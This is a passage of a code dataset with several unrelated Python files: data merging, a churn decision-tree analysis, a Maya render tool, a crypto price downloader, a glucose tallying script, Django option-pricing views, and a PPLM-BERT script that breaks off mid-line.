int(os.path.splitext(os.path.basename(input_filename))[0].split('_')[-1])\n m = json.load(r)\n for c in m:\n c['page_id'] = page_id\n data.extend(m)\noutput_filename = os.path.splitext(os.path.basename(input_dir))[0]\nwith open(output_filename + '.json', 'w', encoding='utf8') as w:\n json.dump(data, w, indent=2, ensure_ascii=False)\n","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"211174124","text":"import math\nimport sys\nfrom time import sleep\nz = 600851475143\nb = 0\ni = 1\nwhile i < math.sqrt(z):\n if z%i == 0:\n if (3**i - 3)%i 
!= 0:\n            u = 0\n        else:\n            e = i\n    if i > 6857 and int((i/(math.sqrt(z)))*100) != b:\n        b = int((i/(math.sqrt(z)))*100)\n        sys.stdout.write('\\r')\n        sys.stdout.write(str(b+1))\n        sys.stdout.write('%')\n        sys.stdout.flush()\n        sleep(0.01)\n    i += 1\nprint ('\\r', e)","sub_path":"Secondaire/P3.03.py","file_name":"P3.03.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"622564126","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 15 12:15:11 2018\n\n@author: kimi\n\"\"\"\n\n# Import libraries & functions ------------------------------------------------\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\n\nprint(os.getcwd())\n#os.chdir('C:/Users/202-22/Documents/Python - Hyesu/Project/telco')\nos.chdir('D:/Data/Python/project')\n\n\n# Load dataset ----------------------------------------------------------------\ntrain_path = \"../data/telco/telco_data_preprocessed.csv\"\n\ntrain = pd.read_csv(train_path, engine='python')\n\ntrain.shape # 7043 x 21\ntrain.head()\ntrain.info()\ntrain.isnull().sum() # no missing value\ntrain.describe()\n\n# 20 predictor variables and 1 target variable('Churn')\ntrain['Churn'].value_counts() # no:5174, yes:1869\n\n\n# Modeling - Decision Tree Classification -------------------------------------\n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\ntrain2 = train.copy()\n\nX_train = train2.drop('Churn', axis=1) # drop() with inplace=True returns None, so keep the returned frame instead\ny_train = train['Churn']\n\nX_tr, X_va, y_tr, y_va = train_test_split(X_train, y_train, test_size=0.3, random_state=0)\nprint(X_tr.shape, y_tr.shape)\nprint(X_va.shape, y_va.shape)\n\ntree = DecisionTreeClassifier(random_state=0)\ntree.fit(X_tr, y_tr) \n# !! ISSUE !!: this model only considers numerical categorical features as categorical features.\n\n\n# Solution 1 - Numeric encoding -----------------------------------------------\n# gather only categorical features for one-hot encoding process\n\ncategory = ['gender', 'SeniorCitizen', 'Partner', 'Dependents', 'PhoneService',\n            'MultipleLines', 'InternetService', 'OnlineSecurity', 'OnlineBackup',\n            'DeviceProtection', 'TechSupport', 'StreamingTV', 'StreamingMovies',\n            'Contract', 'PaperlessBilling', 'PaymentMethod']\n\ncat_data = pd.DataFrame(data=train, columns=category)\ncat_data.shape\n\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.pipeline import Pipeline\n\n## Load a class : MultiColumnLabelEncoder \n\nclass MultiColumnLabelEncoder:\n    def __init__(self,columns = None):\n        self.columns = columns # array of column names to encode\n\n    def fit(self,X,y=None):\n        return self # not relevant here\n\n    def transform(self,X):\n        '''\n        Transforms columns of X specified in self.columns using\n        LabelEncoder(). 
If no columns specified, transforms all\n columns in X.\n '''\n output = X.copy()\n if self.columns is not None:\n for col in self.columns:\n output[col] = LabelEncoder().fit_transform(output[col])\n else:\n for colname,col in output.iteritems():\n output[colname] = LabelEncoder().fit_transform(col)\n return output\n\n def fit_transform(self,X,y=None):\n return self.fit(X,y).transform(X)\n\n# reference: https://stackoverflow.com/questions/24458645/label-encoding-across-multiple-columns-in-scikit-learn\n\n\n# apply this class to cat_data \n \nencoded_cat = MultiColumnLabelEncoder(columns = category).fit_transform(cat_data)\nencoded_cat.head()\n\nfor i in category:\n print(\"Frequency table for\", i, \"\\n\", encoded_cat[i].value_counts(), \"\\n\")\n\n\n# Back to Modeling - Decision Tree Classification -----------------------------\n# Data combination: encoded categorical features + standardized continuous features\n\ncontinuous = ['tenure', 'MonthlyCharges', 'TotalCharges']\ncond_data = pd.DataFrame(data=train, columns= continuous)\n\nfinal_data = pd.concat([cond_data, encoded_cat], axis=1)\nfinal_data.info()\n\n\n# Train/Test data partition ---------------------------------------------------\n\nX_train = final_data\ny_train = train['Churn']\n\nX_tr, X_va, y_tr, y_va = train_test_split(X_train, y_train, test_size=0.3, random_state=0)\nprint(X_tr.shape, y_tr.shape) # 4930 x 19\nprint(X_va.shape, y_va.shape) # 2113 x 19\n\n\n# Standarization of the continuous features\n\nfrom sklearn.preprocessing import StandardScaler\n\nscaler = StandardScaler()\nscaler.fit(X_tr)\nX_tr_scaled = scaler.transform(X_tr)\nX_va_scaled = scaler.transform(X_va)\n\n\n# Modeling - Decision Tree Classification -------------------------------------\n\ntree = DecisionTreeClassifier(random_state=0)\ntree.fit(X_tr_scaled, y_tr)\n\nprint(\"train data accuracy: {:.3f}\".format(tree.score(X_tr_scaled, y_tr))) # 0.997\nprint(\"test data accuracy: {:.3f}\".format(tree.score(X_va_scaled, y_va))) # 0.728 -> overfitting\n\n\n# Decision Tree visualization -------------------------------------------------\n\n #!pip install graphviz \n #!pip install pydotplus \n # Let's not forget to add the path of graphviz to PATH in environment variables \n # Then, restart your Python IDE\n\nfrom sklearn.tree import export_graphviz\nfrom IPython.display import Image\nfrom graphviz import Source\nimport pydotplus\nimport graphviz\n\ndata_feature_names = final_data.columns.values.tolist()\n\ndot_data = export_graphviz(tree, out_file=None, \n feature_names= data_feature_names,\n class_names='Churn')\n\ngraph = Source(dot_data)\npng_bytes = graph.pipe(format='png')\nwith open ('dtree_pipe1.png', 'wb') as f:\n f.write(png_bytes)\n \nImage(png_bytes)\n\n#graph = pydotplus.graph_from_dot_data(dot_data)\n#Image(graph.create_png())\n\n\n# Model tuning - Decision Tree Classification ---------------------------------\ntree2 = DecisionTreeClassifier(max_depth= 10, # original model : 25\n max_leaf_nodes=50,\n # max_features = 10,\n min_samples_leaf = 3,\n random_state=0)\ntree2.fit(X_tr, y_tr)\n\nprint(\"train data accuracy: {:.3f}\".format(tree2.score(X_tr, y_tr))) # 0.831\nprint(\"test data accuracy: {:.3f}\".format(tree2.score(X_va, y_va))) # 0.790\n\n\ndot_data2 = export_graphviz(tree2, out_file=None, \n feature_names = data_feature_names,\n class_names='Churn')\n\ngraph = Source(dot_data2)\npng_bytes2 = graph.pipe(format='png')\nwith open ('dtree_pipe.png', 'wb') as f:\n f.write(png_bytes2)\n \nImage(png_bytes2)\n\n\n# Feature importance 
----------------------------------------------------------\nprint(\"feature importance:\\n{}\".format(tree.feature_importances_)) \n\ndef plot_feature_importances_telco(model):\n    n_features = final_data.shape[1]\n    plt.barh(range(n_features), model.feature_importances_, align='center')\n    plt.yticks(np.arange(n_features), final_data.columns)\n    plt.xlabel(\"feature importance\")\n    plt.ylabel('features')\n    plt.ylim(-1, n_features)\n\nfig = plt.figure(figsize=(10,8))\nplot_feature_importances_telco(tree)\n\n\n## find out the highest accuracy for the test dataset ------------------------\nmax=0; numMax= 0; cnt= 0\nl1 = []\nlni = []\nlnr = []\nfor i in range(5, 21):\n    for j in range(10, 51):\n        for n in range(2, 6):\n            print(\"trial #:\", cnt, \"\\n\", \"max_depth: \", i, \"| max_leaf_nodes: \", j, \"| min_samples_leaf: \", n)\n            tree = DecisionTreeClassifier(max_depth = i, # original model : 25\n                                          max_leaf_nodes = j,\n                                          min_samples_leaf = n,\n                                          random_state=0)\n            tree.fit(X_tr_scaled, y_tr)\n            treetest = tree.score(X_va_scaled, y_va)\n            print(\"train data accuracy: {:.3f}\".format(tree.score(X_tr_scaled, y_tr))) \n            print(\"test data accuracy: {:.3f}\".format(tree.score(X_va_scaled, y_va)))\n            lni.append(tree.score(X_tr_scaled, y_tr))\n            lnr.append(tree.score(X_va_scaled, y_va))\n            cnt += 1\n            l1.append(cnt)\n            if max < treetest:\n                max = treetest\n                numMax = cnt\n\n    \nprint(max, numMax) \n#0.7865593942262187 381\n\n# Plotting the results ---------------------------------------------------------\nfig = plt.figure(figsize=(12,8))\nplt.plot(lni, \"--\", label=\"train set\", color=\"blue\")\nplt.plot(lnr, \"-\", label=\"test set\", color=\"red\")\nplt.plot(numMax, max, \"o\")\nann = plt.annotate(\"max: {:.3f}\".format(max), xy=(numMax, max)) # assumed intent: label the best test accuracy at its point\nplt.legend()\nplt.show()\n\n#trial #: 380 \n#max_depth: 7 | max_leaf_nodes: 23 | min_samples_leaf: 2\n#train data accuracy: 0.810\n#test data accuracy: 0.787\n\n\ntree_final = DecisionTreeClassifier(max_depth=7, \n                                    max_leaf_nodes= 23, \n                                    min_samples_leaf = 2,\n                                    random_state=0)\ntree_final.fit(X_tr_scaled, y_tr)\n\nprint(\"train data accuracy: {:.3f}\".format(tree_final.score(X_tr_scaled, y_tr))) # 0.810\nprint(\"test data accuracy: {:.3f}\".format(tree_final.score(X_va_scaled, y_va))) # 0.787\n\n\n# Decision Tree Model Visualization after tuning ------------------------------\ndot_data3 = export_graphviz(tree_final, out_file=None, \n                         feature_names = data_feature_names,\n                         class_names='Churn', filled=True)\n\ngraph = Source(dot_data3)\npng_bytes = graph.pipe(format='png')\nwith open ('dtree_pipe_final.png', 'wb') as f:\n    f.write(png_bytes)\n    \nImage(png_bytes)\n\n\n# Feature importance ----------------------------------------------------------\n\nfig = plt.figure(figsize=(10,8))\nplot_feature_importances_telco(tree_final)\n\n","sub_path":"Telco_Customer_Churn/2.1_telco_feature_engineering_numericalencoding.py","file_name":"2.1_telco_feature_engineering_numericalencoding.py","file_ext":"py","file_size_in_byte":9235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"542680510","text":"import maya.cmds as mc\nimport os\nimport maya.mel as mel\ndef renderSD(filename,start,end,cam,aformat):\n    rvw=\"showWindow renderViewWindow\"\n    rea=\"renderWindowRenderCamera render renderView \"\n    rpa='renderWindowSaveImageCallback \"renderView\" ('+'\"'+filename.replace('\\\\','\\\\\\\\')\n    mc.currentTime(int(start))\n    i=int(start)\n    j=int(end)+1\n    while i<j:\n        mel.eval(rea+cam) #assumed reconstruction of a mangled span: render the current frame through the chosen camera\n        stk=str(i) #assumed reconstruction: frame number as a string, zero-padded below\n        if len(stk)>0:\n            if 4-len(stk)==3:\n                stk='000'+stk\n            elif 4-len(stk)==2:\n                stk='00'+stk\n            elif 4-len(stk)==1:\n                stk='0'+stk\n            
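# save the rendered view as filename_NNNN.aformat via the renderWindowSaveImageCallback MEL command\n            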
mel.eval(rpa+'_'+stk+'\"'+') \"'+aformat+'\";')\n        mc.currentTime(i)\n        i=i+1\ndef aboutIt():\n    mc.confirmDialog(t='about it',m='If you want to see the rendering of each frame,open the render window!',b='OK')\n    \nif mc.window('RenderInWin',ex=1):\n    mc.deleteUI('RenderInWin',window=1)\nmc.window('RenderInWin',t='Render In Maya',wh=(380,240))\nmc.menuBarLayout()\nmc.menu(l='About')\nmc.menuItem(l='About It',c=\"aboutIt()\")\nmc.scrollLayout('scrollLayout')\nmc.columnLayout(adj=1)\nmc.frameLayout(l='Render Setting')\nlistCam=mc.ls(type='camera')\npc=mc.optionMenu(l='select camera')\nfor cam in listCam:\n    mc.menuItem(l=cam)\nps=mc.textFieldGrp(l='frame start:',tx=1,cl2=('center','center'))\npe=mc.textFieldGrp(l='frame end:',tx=10,cl2=('center','center'))\nmc.frameLayout(l='output file path:')\nmc.text(l='please enter path+filename')\nfn=mc.textFieldGrp(l='filepath:')\nfm=mc.optionMenu(l='file foemat:')\nmc.menuItem(l='Maya IFF')\nmc.menuItem(l='JPEG')\nmc.menuItem(l='TIFF')\nmc.menuItem(l='Targe')\nmc.menuItem(l='PNG')\nmc.menuItem(l='SGI')\nmc.columnLayout(adj=1)\nmc.button(l='Render',c=\"nformat=mc.optionMenu(fm,q=1,v=1);fName=mc.textFieldGrp(fn,q=1,tx=1);pCam=mc.optionMenu(pc,q=1,v=1);pStart=mc.textFieldGrp(ps,q=1,tx=1);pEnd=mc.textFieldGrp(pe,q=1,tx=1);renderSD(fName,pStart,pEnd,pCam,nformat)\")\nmc.showWindow('RenderInWin')","sub_path":"tool/renderAndSave.py","file_name":"renderAndSave.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"277883786","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 5 18:11:20 2020\n\n@author: wanchenzhang\n\"\"\"\n\n\n# Questions:\n# 1. The basic structure is the same as the s1t1.py but has an additional while loop \n# to constantly retrieve data. It seems it didn't work as desired... \nimport pandas as pd\nimport requests\nimport datetime\nimport time\n# Section 1, Task 1\n# Write a function to download histohour data, parameters:\n# fsym: BTC, tsym: USDT, start_time=\"2017-04-01\", end_time=\"2020-04-01\", e='binance'\n# time-zone: UTC\n\ndef get_data(fsym, tsym, start_time, end_time, e):\n    \"\"\" returns pandas DataFrame \n    \"\"\"\n    url = 'https://min-api.cryptocompare.com/data/v2/histohour?'\n    fmt = \"%Y-%m-%d %H:%M:%S\"\n    start_time = str(datetime.datetime.strptime(start_time, '%Y-%m-%d'))\n    start_time = int(time.mktime(time.strptime(start_time, fmt)))\n    end_time = str(datetime.datetime.strptime(end_time, '%Y-%m-%d'))\n    end_time = int(time.mktime(time.strptime(end_time, fmt)))\n    date = end_time\n    holder = []\n    # Retrieve the data backwards\n    while date>start_time:\n        # Build the full URL from the unchanged base plus the given parameters\n        full_url = url+\"fsym=\"+fsym+\"&tsym=\"+tsym+\"&e=\"+e+'&limit=2000'+'&toTs='+str(date)\n        f = requests.get(full_url)\n        ipdata = f.json()\n        df = pd.DataFrame(ipdata['Data']['Data'])\n        df = df.iloc[:, 0:-2]\n        df['datetime'] = df['time']\n        df = df.rename(columns={'volumefrom': 'volume'})\n        df = df.rename(columns={'volumeto': 'baseVolume'})\n        #for i in range(len(df)):\n            #df['datetime'][i] = datetime.datetime.utcfromtimestamp(df['datetime'][i]).strftime(fmt)\n        df['datetime'] = pd.to_datetime(df['time'],unit='s')\n        print(df)\n        holder.append(df)\n        # Update the date (keep epoch seconds so the comparison with start_time works)\n        date = int(df['time'][0])\n    \n    # combine the chunks and sort by date ascendingly\n    holder = pd.concat(holder, ignore_index=True).sort_values(by = ['datetime'])\n    return holder\n\n\n    \n    \n\n\n\n\n\n\n\n\n\n\n\n# Use the __main__ section for all of your test cases. 
\n# This section will automatically be executed when the file is run in Python\nif __name__ == '__main__':\n print(get_data('BTC','USDT', \"2017-04-01\",\"2020-04-01\",'binance'))\n","sub_path":"section1/task1/section1task1.py","file_name":"section1task1.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"107201412","text":"# revised 180130\n# coding:utf-8\nimport xlrd\nimport xlwt\nfrom xlutils.copy import copy\nimport time\n\nfrom dayCount_print import print_excel\n\nclass patient():\n def __init__(self, info):\n self.name = info[0]\n self.age = info[1]\n self.hos_area= info[4]\n self.bld_glu = info[7]\n self.opr_dat = info[8]\n self.opr_tim = info[13]\n\n#def timepoint(p):\n #if (p.opr_tim.find(\"16点30\") >= 0) or (p.opr_tim.find(\"10点30\") >= 0) or (p.opr_tim.find(\"6点\") >= 0) or (p.opr_tim.find(\"早餐前\") >= 0):\n #timetype=1\n #elif (p.opr_tim.find(\"8点30\") >= 0) or (p.opr_tim.find(\"13点\") >= 0) or (p.opr_tim.find(\"19点\") >= 0):\n #timetype=2\n #else:\n #timetype=3\n #return timetype\n\ndef PDvalue_main_jian(filename, sheetname, startDate=\"\", endDate=\"\", district=[]):\n start_time = time.time()\n fd_excel = xlrd.open_workbook(filename) #打开文件\n table = fd_excel.sheet_by_name(sheetname) #读取sheet0\n \n n=0\n i=0 #写到第几行\n n=0 #每个pd里的血糖个数\n \n sum0=0 #每个pd里血糖总和\n \n average0=0 #每个pd里平均血糖\n \n max_row = table.nrows\n pdaverage=[] #pd平均血糖一列\n low_perpd=0 #每个pd中低血糖次数\n pd_withlow=0 #有至少一次低血糖的pd个数\n pdn=[] #每个pd中的血糖个数合集\n \n p0=patient(table.row_values(1)) \n n=1 \n sum0=p0.bld_glu \n if p0.bld_glu <=3.9 :\n low_perpd +=1 \n for r in range(2,max_row):\n p = patient(table.row_values(r)) \n former=patient(table.row_values(r-1))\n former_day=xlrd.xldate_as_tuple(former.opr_dat, 0)[0:3]\n \n p_day = xlrd.xldate_as_tuple(p.opr_dat, 0)[0:3]\n if (startDate != \"\"):\n start_date = tuple(map(int, startDate.split(\"-\")))\n if (start_date > p_day):\n continue\n if (endDate != \"\"):\n end_date = tuple(map(int, endDate.split(\"-\")))\n if (end_date < p_day):\n continue\n if (district != []) and (p.hos_area not in district):\n continue\n\n if (former.name==p.name)and (former_day==p_day):\n \n n+=1\n sum0+=p.bld_glu\n if p.bld_glu <=3.9 :\n low_perpd +=1 \n else:\n if n!=0:\n average0=float(sum0)/float(n)\n if average0!=0:\n pdaverage.append(average0)\n if low_perpd!=0:\n pd_withlow +=1\n low_perpd=0\n pdn.append(n)\n n=1\n sum0=p.bld_glu\n average0=0\n if p.bld_glu <=3.9 :\n low_perpd +=1 \n last=patient(table.row_values(max_row-1))\n last_former=patient(table.row_values(max_row-2))\n last_former_day=xlrd.xldate_as_tuple(last_former.opr_dat, 0)[0:3]\n last_day = xlrd.xldate_as_tuple(last.opr_dat, 0)[0:3] \n if (last_former.name!=last.name)or (last_former_day!=last_day):\n average0=last.bld_glu\n pdaverage.append(average0)\n \n \n \n print_excel(\"不分时刻pd总数\", [len(pdaverage)],2) \n print_excel(\"不分时刻每个pd\", pdaverage,3)\n print_excel(\"不分时刻pd至少一次低血糖的个数\", [pd_withlow],2) \n \n print(\"the project costs: \", time.time()-start_time)\n \nif __name__ == \"__main__\":\n PDvalue_main_jian(\"huge.xlsx\", \"jian\", startDate=\"2018-07-01\", endDate=\"2019-06-30\", \n district=['2病区', '4病区'])\n","sub_path":"patientDay_PDvalue_jian.py","file_name":"patientDay_PDvalue_jian.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"60040397","text":"from django.http import HttpResponse\nfrom django.http import 
JsonResponse\nfrom django.shortcuts import render\n\nfrom mcarlo_app.data_utils import DataRender, DataExtractor\nfrom mcarlo_app.domain import *\nfrom mcarlo_app.engine import Engine\n\n\ndef home(request):\n return render(request,'home.html')\n\ndef about(request):\n return render(request,'about.html')\n\ndef demo_iteration(request):\n iterationParam = DataExtractor.parse_param_iteration(request)\n if 'show_cvs' not in request.GET and 'show_api' not in request.GET and 'show_graph' not in request.GET:\n return render(request, 'iteration.html', {'param': iterationParam})\n engine = Engine(param=iterationParam)\n strikes = iterationParam.strike\n risk_aversion = iterationParam.risk_aversion\n number_of_iterations = iterationParam.iterations\n payoffs = engine.compute_payoff_by_iterations(number_of_iterations,strikes,risk_aversion)\n output = OutPut(iterationParam)\n output.payoffs = payoffs\n if 'show_cvs' in request.GET:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"monte-carlo-effect-iteration.csv\"'\n return DataRender.to_csv(output,response)\n if 'show_api' in request.GET:\n return JsonResponse(output.as_json())\n if 'show_graph' in request.GET:\n call_graph, graph_put = DataRender.to_graph_iteration(payoffs, strikes)\n return render(request,'iteration.html',{'param': iterationParam, 'output':output,'graph_put': graph_put,'graph_call': call_graph})\n\n\ndef demo_risk(request):\n riskParam = DataExtractor.parse_param_risk(request)\n if 'show_cvs' not in request.GET and 'show_api' not in request.GET and 'show_graph' not in request.GET:\n return render(request, 'risk.html', {'param': riskParam})\n strikes = riskParam.strike\n risk_aversions = riskParam.risk_aversion\n iteration = riskParam.iterations\n engine = Engine(param=riskParam)\n payoffs = engine.compute_payoff_by_risk_aversion(iteration,strikes,risk_aversions)\n output = OutPut(riskParam)\n output.payoffs = payoffs\n if 'show_cvs' in request.GET:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"monte-carlo-effect-risk.csv\"'\n return DataRender.to_csv_risk(output,response)\n if 'show_api' in request.GET:\n return JsonResponse(output.as_json())\n if 'show_graph' in request.GET:\n call_graph, graph_put = DataRender.to_graph_risk(payoffs, strikes)\n return render(request,'risk.html',{'param': riskParam, 'output':output,'graph_put': graph_put,'graph_call': call_graph})\n\n\ndef demo_volatility(request):\n param = DataExtractor.parse_param_volatility(request)\n print(param.as_json())\n if 'show_cvs' not in request.GET and 'show_api' not in request.GET and 'show_graph' not in request.GET:\n return render(request, 'volatility.html', {'param': param})\n engine = Engine(param=param)\n number_of_iterations = 10000\n payoff_vol_stoch, payoff_vol_constant = engine.compute_payoff_by_volatility(number_of_iterations,param.strike,param.risk_aversion)\n json = DataRender.to_json(payoff_vol_stoch, payoff_vol_constant, param)\n if 'show_cvs' in request.GET:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"monte-carlo-effect-volatility.csv\"'\n return DataRender.to_csv_vol(json,response)\n\n if 'show_api' in request.GET:\n return JsonResponse(json.as_json())\n output = zip(payoff_vol_stoch, payoff_vol_constant)\n output_put = zip(payoff_vol_stoch, payoff_vol_constant)\n if 'show_graph' in request.GET:\n call_graph, graph_put = 
DataRender.to_graph_volatility(payoff_vol_stoch, payoff_vol_constant, param.strike)\n return render(request, 'volatility.html',{'param': param, 'output': output, 'output_put': output_put, 'graph_put': graph_put,'graph_call': call_graph})\n return render(request,'volatility.html',{'param': param})\n\n","sub_path":"mcarlo_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"497878006","text":"#! /usr/bin/env python3\n# coding=utf-8\n# Copyright 2018 The Uber AI Team Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nExample command with bag of words:\npython examples/run_pplm.py -B space --cond_text \"The president\" --length 100 --gamma 1.5 --num_iterations 3 --num_samples 10 --stepsize 0.01 --window_length 5 --kl_scale 0.01 --gm_scale 0.95\n\nExample command with discriminator:\npython examples/run_pplm.py -D sentiment --class_label 3 --cond_text \"The lake\" --length 10 --gamma 1.0 --num_iterations 30 --num_samples 10 --stepsize 0.01 --kl_scale 0.01 --gm_scale 0.95\n\"\"\"\n\nimport argparse\nimport json\nfrom operator import add\nfrom typing import List, Optional, Tuple, Union\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom graphviz import Digraph\nfrom torch.autograd import Variable\n# make_dot was moved to https://github.com/szagoruyko/pytorchviz\nfrom torchviz import make_dot\n\n\nfrom tqdm import trange\nfrom transformers import BertTokenizer\nfrom transformers.file_utils import cached_path\nfrom transformers.modeling_bert import BertModel,BertForMaskedLM\n\nfrom pplm_classification_head import ClassificationHead\nfrom run_pplm import to_var,top_k_filter,get_bag_of_words_indices_bert,build_bows_one_hot_vectors\nPPLM_BOW = 1\nPPLM_DISCRIM = 2\nPPLM_BOW_DISCRIM = 3\nSMALL_CONST = 1e-15\nBIG_CONST = 1e10\n\nQUIET = 0\nREGULAR = 1\nVERBOSE = 2\nVERY_VERBOSE = 3\nVERBOSITY_LEVELS = {\n 'quiet': QUIET,\n 'regular': REGULAR,\n 'verbose': VERBOSE,\n 'very_verbose': VERY_VERBOSE,\n}\n\nBAG_OF_WORDS_ARCHIVE_MAP = {\n 'legal': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/legal.txt\",\n 'military': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/military.txt\",\n 'monsters': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/monsters.txt\",\n 'politics': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/politics.txt\",\n 'positive_words': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/positive_words.txt\",\n 'religion': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/religion.txt\",\n 'science': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/science.txt\",\n 'space': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/space.txt\",\n 'technology': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/technology.txt\",\n}\n\nDISCRIMINATOR_MODELS_PARAMS = {\n 
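# NOTE (added): these discriminator heads were trained on gpt2-medium\n    # activations (embed_size 1024), while BERT-base hidden states are 768-wide,\n    # so reusing them unchanged with this BERT script is an untested assumption.\n    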
\"clickbait\": {\n \"url\": \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/discriminators/clickbait_classifier_head.pt\",\n \"class_size\": 2,\n \"embed_size\": 1024,\n \"class_vocab\": {\"non_clickbait\": 0, \"clickbait\": 1},\n \"default_class\": 1,\n \"pretrained_model\": \"gpt2-medium\",\n },\n \"sentiment\": {\n \"url\": \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/discriminators/SST_classifier_head.pt\",\n \"class_size\": 5,\n \"embed_size\": 1024,\n \"class_vocab\": {\"very_positive\": 2, \"very_negative\": 3},\n \"default_class\": 3,\n \"pretrained_model\": \"gpt2-medium\",\n },\n}\ndef getBack(var_grad_fn):\n print(var_grad_fn)\n for n in var_grad_fn.next_functions:\n if n[0]:\n try:\n tensor = getattr(n[0], 'variable')\n print(n[0])\n print('Tensor with grad found:', tensor)\n print(' - gradient:', tensor.grad)\n print()\n except AttributeError as e:\n getBack(n[0])\n\n\ndef perturb_hidden_bert(\n all_hidden,\n model,\n masked,\n context = None,\n masked_lm_labels = None,\n unpert_all_hidden=None,\n unpert_logits=None,\n grad_norms=None,\n stepsize=0.01,\n one_hot_bows_vectors=None,\n classifier=None,\n class_label=None,\n loss_type=0,\n num_iterations=3,\n horizon_length=1,\n decay=False,\n gamma=1.5,\n kl_scale=0.01,\n device='cuda',\n verbosity_level=REGULAR\n):\n #This function perturb the hidden representation and output the new hid-rep (for all the masked tokens)\n\n # Generate inital perturbed past\n # Here initialize grad, should only be w.r.t. the parts we are actually updating tho\n # We don't perturb the last layer since it's not meaningful!\n grad_accumulator = [\n (np.zeros(p_.shape).astype(\"float32\"))\n for p_ in all_hidden[:-1]\n ]\n\n decay_mask = 1.0\n #TODO Change this mask so that only unmasked hiddens are updated, can experiment with different setting\n if True:\n window_mask = torch.ones_like(all_hidden[0]).to(device)\n # accumulate perturbations for num_iterations\n loss_per_iter = []\n new_accumulated_hidden = None\n sentence_length = all_hidden[0].shape[1]\n masked_indices = np.where(masked_lm_labels[0].cpu().numpy() > 0)[0]\n is_masked = torch.ones_like(all_hidden[0]).to(device)\n #masked token = 1, unmasked = 0\n is_masked[0][masked_indices] = 0\n unpert_hidden = all_hidden\n\n #we never modify the accumulated_hidden of unmasked tokens!\n accumulated_unmasked_hidden = (unpert_hidden[-1] * (1-is_masked)).sum(1)[0]\n for i in range(num_iterations):\n #in each iteration, update something\n\n if verbosity_level >= VERBOSE:\n print(\"Iteration \", i + 1)\n curr_perturbation = [\n to_var(torch.from_numpy(p_), requires_grad=True, device=device)\n for p_ in grad_accumulator\n ]\n\n # Compute hidden using perturbed hidden\n perturbed_hidden = list(map(add, all_hidden[:-1], curr_perturbation))\n # curr_perturbation[2].register_hook(print('current grad layer [1]', curr_perturbation[0].grad))\n # _, _, _, curr_length, _ = curr_perturbation[0].shape\n ##manually calculate bert outputs\n new_hidden = [h for h in all_hidden]\n for layer_no,layer in enumerate(model.bert.encoder.layer):\n #calculate the output of this layer by applying the module of this layer to hidden of previous layers\n input_hidden = perturbed_hidden[layer_no] * is_masked + new_hidden[layer_no] * (1-is_masked)\n new_hidden[layer_no+1] = layer(hidden_states = input_hidden)[0] \n \n # output_hidden = model.bert.encoder.layer[-1](hidden_states = perturbed_hidden[-1])[0] \n #### _, all_pred_logits, all_hidden = model(input_ids = context, masked_lm_labels = masked_lm_labels)\n 
#use last layer hidden output for prediction\n all_pred_logits = model.cls(new_hidden[-1]) \n # getBack(loss.grad_fn)\n\n\n # make_dot(loss).view()\n hidden = all_hidden[-1]\n accumulated_masked_hidden = (new_hidden[-1] * is_masked).sum(1)[0]\n new_accumulated_hidden = accumulated_unmasked_hidden + accumulated_masked_hidden\n # new_accumulated_hidden = None\n # TODO: Check the layer-norm consistency of this with trained discriminator (Sumanth)\n #TODO Fix this, GPT2 might be different with Bert here\n #only take the masked token logits for loss calculation\n logits = all_pred_logits[0, masked_indices]\n probs = F.softmax(logits, dim=-1)\n\n loss = 0.0\n loss_list = []\n if loss_type == PPLM_BOW or loss_type == PPLM_BOW_DISCRIM:\n for one_hot_bow in one_hot_bows_vectors:\n bow_logits = torch.mm(probs, torch.t(one_hot_bow))\n bow_loss = -torch.log(torch.sum(bow_logits))\n loss += bow_loss\n loss_list.append(bow_loss)\n if verbosity_level >= VERY_VERBOSE:\n print(\" pplm_bow_loss:\", 